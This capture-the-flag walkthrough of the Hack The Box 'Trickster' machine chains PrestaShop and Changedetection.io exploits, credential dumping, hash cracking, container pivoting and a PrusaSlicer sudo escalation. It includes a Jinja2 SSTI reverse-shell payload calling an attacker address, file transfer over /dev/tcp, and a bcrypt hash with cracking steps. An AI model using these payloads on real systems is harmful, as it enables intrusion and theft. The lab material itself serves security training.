Introduction to Trickster:

In this write-up, we will explore the “Trickster” machine from Hack The Box, categorized as a medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

The objective of Trickster:

The goal of this walkthrough is to complete the “Trickster” machine from Hack The Box by achieving the following objectives:

User Flag:

Exploiting PrestaShop for Initial Access and Credential Discovery

We exploit a vulnerable PrestaShop CMS (CVE-2024-34716) hosting an online shop to gain an initial shell as www-data. Database credentials read from PrestaShop's PHP configuration give us the back-office password hashes, and cracking one of them yields SSH access as a low-privileged user, from which we can explore the rest of the environment.

Root Flag:

Pivoting via Changedetection.io SSTI and Root Escalation with PrusaSlicer

From that user we pivot into a Changedetection.io container reachable only from the host and abuse an SSTI flaw (CVE-2024-32651) to get a shell inside it. Backups stored in the container reveal credentials for another user, adam, who is allowed to run a vulnerable PrusaSlicer 2.6.1 binary as root via sudo, which ultimately gives us root on the host.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.34

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $nmap -sC -sV 10.10.11.34 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 22:11 EST
Nmap scan report for 10.10.11.34
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.18 seconds
┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $

Analysis:

  • Port 22 (SSH): OpenSSH 8.9p1 on Ubuntu with ECDSA and ED25519 host keys for secure remote access.
  • Port 80 (HTTP): Apache 2.4.52 on Ubuntu with a redirect to http://trickster.htb/.

Web Enumeration

Web Application Exploration:

Perform web enumeration to discover potentially exploitable directories and files. The Nmap scan showed a redirect to http://trickster.htb/, so add that name (and any subdomain found later) to /etc/hosts before browsing.

While exploring the website, we discover a subdomain, shop.trickster.htb, which appears to be built on the PrestaShop CMS.

┌─[dark@parrot]─[~/Documents/htb/trickster]
└──╼ $ffuf -c -w /opt/SecLists/Discovery/Web-Content/common.txt -t 20 -fc 404,403 -e .php,.html,.txt,.md -u http://shop.trickster.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shop.trickster.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/common.txt
 :: Extensions       : .php .html .txt .md 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 20
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404,403
________________________________________________

.git/config             [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 24ms]
.git                    [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 41ms]
.git/HEAD               [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 39ms]
.git/index              [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 17ms]
.git/logs/              [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 14ms]
:: Progress: [23695/23695] :: Job [1/1] :: 427 req/sec :: Duration: [0:01:07] :: Errors: 0 ::

Fuzzing for hidden content reveals an exposed .git directory. Since .git/config, .git/HEAD and .git/index are all readable, the repository can be reconstructed.

git-dumper downloads the repository from the exposed directory (git-dumper http://shop.trickster.htb/.git/ ./shop).

In the dump, the directory admin634ewutrx1jgitlooaj is the renamed PrestaShop admin path, which the exploit later needs, and the source reveals the installed PrestaShop version, 8.1.5.

What is the PrestaShop application?

PrestaShop is a free, open-source e-commerce platform designed to help individuals and businesses create and manage online stores. It is built using PHP and MySQL and offers a highly customizable and user-friendly environment for selling products or services online. PrestaShop supports multiple languages and currencies, making it ideal for global businesses. Users can extend its functionality with plugins, modules, and themes available in its marketplace.

CVE-2024-34716 Vulnerability on Trickster machine

Check for vulnerabilities at CVE-2024-34716 on CVE Details, and find the PoC on GitHub.

When running the PoC, you’ll notice it depends on the ncat binary, so you might need to make a slight modification to use nc or any other similar tool.

Because www-data has limited rights, the usual next step is to look for credentials in the application's PHP configuration. PrestaShop 8 keeps its database user and password in app/config/parameters.php under the web root. The shell obtained from the PoC is not very stable, so reading these files may take a few attempts, but it is worth the effort.

Script Overview on Trickster Machine

The PoC first collects the target PrestaShop URL, the admin e-mail address, the attacker's IP and the obfuscated admin path recovered from the Git dump. It then edits its bundled HTML and PHP templates to build a malicious module ZIP containing a reverse-shell script, fetches the security token with a GET request and submits the crafted payload with a POST request.

It also serves the ZIP from a local HTTP server on port 12345 and waits on an ncat listener for the callback; once the reverse shell arrives we control the web server as www-data. The fix on the defending side is to upgrade PrestaShop to a release that patches CVE-2024-34716; strong admin passwords, regular backups and endpoint protection reduce the impact but do not close the hole.

Enumeration on www-data access

The database username and password read from the configuration file give us a login to the MySQL server.

MySQL database enumeration on Trickster machine

Use those database credentials to log into MySQL and read the PrestaShop database, but first upgrade the reverse shell to a fully interactive TTY, since the mysql client misbehaves without one. Then connect and dump the employee password hashes.

The ps_employee table holds the back-office users with access to the platform. The first row is admin@trickster.htb, whose password is stored as the bcrypt hash $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C; the account has profile ID 1, is active, and last connected on 2024-10-16. The second row is james@trickster.htb with a different hash.

Crack James's hash with hashcat: the $2y$ prefix is bcrypt, hash mode 3200. Bcrypt at cost 10 is deliberately slow, so use a targeted wordlist such as rockyou rather than a brute-force mask.
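As an added example (not code from the write-up), the Python below takes rows as the ps_employee query returns them, confirms each hash is bcrypt by parsing its modular-crypt fields, and produces the user:hash lines plus the hashcat command line that cracks them. The admin row uses the hash quoted above; the james row is a constructed placeholder of the same shape, not the real hash.

```python
"""
Added example: prepare a ps_employee dump for hashcat.
Not from the write-up or from PrestaShop; the james hash is a constructed
placeholder with the right shape, not the real value.
"""
import re
from typing import Dict, List, Sequence, Tuple

# Modular-crypt bcrypt: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Rows as `SELECT email, passwd FROM ps_employee;` returns them.
# First row: the admin hash quoted in the write-up.
# Second row: constructed placeholder (same length/alphabet, not real).
PS_EMPLOYEE_ROWS: List[Tuple[str, str]] = [
    ("admin@trickster.htb",
     "$2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C"),
    ("james@trickster.htb", "$2y$10$" + "A" * 22 + "B" * 31),
]


def parse_bcrypt(h: str) -> Dict[str, object]:
    """Split a bcrypt string into its fields; raises ValueError otherwise."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h[:8])
    variant, cost, salt, digest = m.groups()
    return {"variant": variant, "cost": int(cost), "salt": salt, "digest": digest}


def hashcat_lines(rows: Sequence[Tuple[str, str]]) -> List[str]:
    """One `user:hash` line per bcrypt row; non-bcrypt rows are skipped
    so a mixed dump (e.g. legacy MD5 entries) does not break hashcat."""
    out = []
    for email, passwd in rows:
        try:
            parse_bcrypt(passwd)
        except ValueError:
            continue
        out.append("%s:%s" % (email, passwd))
    return out


def hashcat_argv(hashfile: str, wordlist: str) -> List[str]:
    """bcrypt is hashcat mode 3200; --username tells hashcat to ignore
    the `user:` prefix and report cracked entries per user."""
    return ["hashcat", "-m", "3200", "--username", hashfile, wordlist]


if __name__ == "__main__":
    for email, passwd in PS_EMPLOYEE_ROWS:
        print(email, parse_bcrypt(passwd))
    with open("ps_employee.hashes", "w") as fh:
        fh.write("\n".join(hashcat_lines(PS_EMPLOYEE_ROWS)) + "\n")
    print(" ".join(hashcat_argv("ps_employee.hashes",
                                "/usr/share/wordlists/rockyou.txt")))
```

Because bcrypt at cost 10 allows only thousands of guesses per second per GPU, feed hashcat a targeted wordlist rather than a mask attack, and read the results afterwards with the same command plus --show.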

The cracked password is accepted over SSH as james.

Read the user flag with cat user.txt.

Escalate to Root Privileges Access

Privilege Escalation:

Start a shell session as the user james and use the sudo -l command to enumerate the user’s privileges and the system configuration.

Explore the directories to identify valuable files or misconfigurations that could be exploited to gain further access or escalate privileges.

Pivoting into Docker with Port Forwarding

The host runs Docker: its network interfaces include the 172.17.0.0/16 bridge.

Scanning that network from the james shell finds a container at 172.17.0.2 with port 5000 open. The port is not reachable from our machine directly, so we forward it through the compromised host with local port forwarding:

ssh -L 5000:172.17.0.2:5000 james@trickster.htb

ssh binds the forwarded port to loopback by default, so the service is now available at http://127.0.0.1:5000 on the attacking machine only.

CVE-2024-32651 enumeration

Description
Summary
A Server-Side Template Injection (SSTI) vulnerability in Changedetection.io, caused by the use of unsafe Jinja2 functions, enables Remote Command Execution (RCE) on the server host.

Details
Affected version: Changedetection.io version 0.45.20

The vulnerability results from the usage of unsafe functions in the Jinja2 template engine:

from jinja2 import Environment, BaseLoader
...
    # Get the notification body from datastore  
    jinja2_env = Environment(loader=BaseLoader)  
    n_body = jinja2_env.from_string(n_object.get('notification_body', '')).render(**notification_parameters)  
    n_title = jinja2_env.from_string(n_object.get('notification_title', '')).render(**notification_parameters)  

Proof of Concept (PoC)

  1. Create or edit a URL watch item.
  2. The payload below can be uploaded in the Notification tab
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

This payload triggers command execution, revealing the output of the id command.
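As an added example (not code from Changedetection.io or from this write-up), the snippet below reproduces the vulnerable rendering pattern quoted above beside a sandboxed version and pushes the PoC payload through both, with `id` replaced by a harmless echo. It assumes only that the jinja2 package is installed; NOTIFICATION_PARAMS stands in for the parameters the real code passes to render().

```python
"""
Added example: the unsafe Jinja2 pattern from the advisory next to the
sandboxed form. Not Changedetection.io code; the command in the payload
is an echo so the example is safe to run anywhere.
"""
from jinja2 import Environment, BaseLoader
from jinja2.sandbox import ImmutableSandboxedEnvironment, SecurityError

# The PoC payload with `id` swapped for a harmless echo.
PAYLOAD = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo ssti-rce').read() }}"
)

# Stand-in for notification_parameters (constructed values).
NOTIFICATION_PARAMS = {"watch_url": "http://example.invalid/", "title": "demo"}


def render_unsafe(notification_body: str) -> str:
    """Mirror of the vulnerable code: a plain Environment renders
    attacker-controlled text, so dunder traversal reaches __import__."""
    jinja2_env = Environment(loader=BaseLoader)
    return jinja2_env.from_string(notification_body).render(**NOTIFICATION_PARAMS)


def render_sandboxed(notification_body: str) -> str:
    """Hardened form: the sandbox refuses attribute access to names that
    start with '_' and raises SecurityError instead of continuing."""
    jinja2_env = ImmutableSandboxedEnvironment(loader=BaseLoader)
    return jinja2_env.from_string(notification_body).render(**NOTIFICATION_PARAMS)


def is_blocked(notification_body: str) -> bool:
    """True when the sandbox stops the template with SecurityError."""
    try:
        render_sandboxed(notification_body)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print("plain Environment   :", render_unsafe(PAYLOAD).strip())
    print("sandbox blocked it  :", is_blocked(PAYLOAD))
    # Ordinary notification templates still work inside the sandbox.
    print("benign template     :", render_sandboxed("Change on {{ watch_url }}"))
```

Run it and the plain Environment returns the command output, while ImmutableSandboxedEnvironment raises SecurityError on the first underscore-prefixed attribute; that sandbox swap is the standard fix for this class of bug, and benign templates such as {{ watch_url }} keep rendering.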

Once the port is forwarded, open http://127.0.0.1:5000 in Firefox; the login form accepts the james password we cracked earlier.

Vulnerability POC

A Changedetection.io webpage is accessible, allowing it to track changes on websites and notify users of updates, such as news articles or product changes. Certain versions are vulnerable to SSTI, as outlined in CVE-2024-32651. A proof-of-concept (PoC) for exploiting this vulnerability is available here.

Upon accessing the port on my machine, a login page is displayed.

The manual route, with 10.10.xxx.xxx standing for the attacker's VPN address:

  1. Start a web server on the attacking machine (for example python3 -m http.server) that serves an index.html; this is the page Changedetection.io will watch.
  2. Add a new watch whose URL points at that index.html.
  3. In the "Notifications" tab, set the notification URL to gets://10.10.xxx.xxx and paste the following Jinja2 SSTI reverse-shell payload into the notification body:

{{ self.__init__.__globals__.__builtins__.__import__('os').system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.xxx.xxx\",1919));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")"') }}

  4. Start a listener on the port named in the payload (nc -lvnp 1919).

Upon clicking "Save", the first request arrives at our local HTTP server: the application fetches index.html and begins monitoring it.

The watch is rechecked at its configured interval (30 seconds here). A notification, and with it the template rendering that executes the payload, is only sent when a change is detected, so modify index.html on the local HTTP server and wait for the next check, or click "Recheck" to force one immediately.

Once the change is detected, the notification body is rendered and the reverse shell connects back to the port given in the payload (1919 above).

After a short wait we have a shell inside the container.

Exploring Another Approach to Utilizing the Python Script

The script automates the same SSTI against Changedetection.io: it adds a new watch, writes the payload into its notification settings and triggers the check, so the server renders the template and executes the injected command.

It starts by requesting the login page to obtain the CSRF token that every form submission needs, then logs in and submits the forms with crafted values. When a change in the monitored page is detected, the notification body is rendered and the reverse shell connects back to the attacker's machine on the specified port.

Indeed, we successfully retrieved a shell similar to the previous one using the Python script.

Unpacking the Mystery of the .br Extension on Trickster Machine

The web application runs in a container, so the shell we obtained is root inside the container (172.17.0.2), not on the Trickster host (172.17.0.1 is the host's address on the Docker bridge).

Looking for a way out of the container or for further credentials, we find Changedetection.io backups under /datastore/Backups/.

To move them to the james session on the host, start a listener there for each file and write what arrives to disk:

nc -lvnp 9007 > changedetection-backup-20240830202524.zip

then, from the container, push the file over bash's /dev/tcp pseudo-device (restart the listener with the second file name before sending it):

cat changedetection-backup-20240830202524.zip > /dev/tcp/172.17.0.1/9007
cat changedetection-backup-20240830194841.zip > /dev/tcp/172.17.0.1/9007

Compare md5sum output on both ends before unzipping, since a truncated transfer produces a corrupt archive.

Inside the ZIP files are two .txt.br files: snapshots compressed with Brotli (https://fileinfo.com/extension/br), Google's compression algorithm designed for HTTP content such as HTML, CSS and JavaScript. They must be decompressed before they can be read, either with the brotli command-line tool (brotli -d name.txt.br writes name.txt next to it) or with the brotli Python package. The decompressed snapshots are the page history Changedetection.io recorded, and that history is where the credentials used in the next section come from.

Shell as Adam Access

During enumeration the root password turned up in the history tab, which felt too easy for a medium box, especially as the adam account had not been needed at all. The intended route goes through adam, so that is what we walk through next.

Shell as adam: there is little to explore beyond the datastore folder.

SSH in as adam with the recovered password. Running sudo -l shows that adam may execute the prusaslicer binary as root without a password.

Prusaslicer exploitation on Trickster machine

Researching the binary turns up a recent code-execution exploit for PrusaSlicer 2.6.1: Exploit-DB #51983.

A ready-made payload generator exists; clone it with:

git clone https://github.com/suce0155/prusaslicer_exploit

The payload has to be adapted to our target: the reverse-shell address and port in exploit.sh, and the path at which the project file expects to find that script.

The mechanism: exploit.sh holds a reverse-shell command. As adam, we copy it to the location the project file expects, make it executable, and then run PrusaSlicer as root through sudo on the crafted project file evil.3mf. PrusaSlicer normally prepares 3D print jobs; here the exploit abuses its post-processing-script setting, which is stored inside the project, so when PrusaSlicer slices evil.3mf it executes exploit.sh with root privileges and the shell connects back to the attacker's IP and port. The string "EXPLOIT" printed by the script confirms that it ran.
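As an added example (not part of this write-up or of the exploit repository), the script below builds a minimal 3MF in memory and scans it for a post_process entry in the embedded PrusaSlicer print configuration, the setting this exploit class abuses. It assumes PrusaSlicer stores its print settings at Metadata/Slic3r_PE.config inside the 3MF archive; check that path against the version you are handling. It is a triage check for suspicious project files, not an exploit.

```python
"""
Added example: find post-processing scripts declared inside a 3MF.
Not from the write-up or from the exploit repository.
Assumption: PrusaSlicer keeps the print config at Metadata/Slic3r_PE.config
in the 3MF zip, one `; key = value` line per setting (verify per version).
"""
import io
import re
import zipfile
from typing import List, Sequence

PRINT_CONFIG_MEMBER = "Metadata/Slic3r_PE.config"  # assumed path, see above

# Matches `; post_process = /tmp/exploit.sh` and `post_process = ...`;
# group 1 is the value with surrounding spaces trimmed.
POST_PROCESS_RE = re.compile(
    r"^[ \t]*;?[ \t]*post_process[ \t]*=[ \t]*(.*?)[ \t]*$", re.MULTILINE
)

# Smallest well-formed 3MF model document (constructed sample).
MINIMAL_MODEL_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<model unit="millimeter" xml:lang="en-US" '
    'xmlns="http://schemas.microsoft.com/3dmanufacturing/core/2015/02">\n'
    "  <resources/><build/>\n</model>\n"
)


def build_3mf(config_lines: Sequence[str], include_config: bool = True) -> bytes:
    """Return the bytes of a 3MF whose print config holds config_lines.
    Constructed sample: a real PrusaSlicer project carries far more."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("3D/3dmodel.model", MINIMAL_MODEL_XML)
        if include_config:
            z.writestr(PRINT_CONFIG_MEMBER, "\n".join(config_lines) + "\n")
    return buf.getvalue()


def find_post_process(three_mf: bytes) -> List[str]:
    """Return every non-empty post_process value in the 3MF's print
    config, or [] when the file declares none (or has no config)."""
    with zipfile.ZipFile(io.BytesIO(three_mf)) as z:
        if PRINT_CONFIG_MEMBER not in z.namelist():
            return []
        text = z.read(PRINT_CONFIG_MEMBER).decode("utf-8", "replace")
    return [m.group(1) for m in POST_PROCESS_RE.finditer(text) if m.group(1)]


if __name__ == "__main__":
    benign = build_3mf(["; layer_height = 0.2", "; post_process = "])
    suspicious = build_3mf(["; layer_height = 0.2",
                            "; post_process = /tmp/exploit.sh"])
    print("benign    :", find_post_process(benign))
    print("suspicious:", find_post_process(suspicious))
```

Anything this returns should be treated as code that runs with the privileges of whoever slices the file; the real mitigation on Trickster is not a filter but removing the sudo rule that lets an unprivileged user run PrusaSlicer as root.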

We have successfully gained root access to the system.

We can retrieve the root flag by executing the command cat root.txt.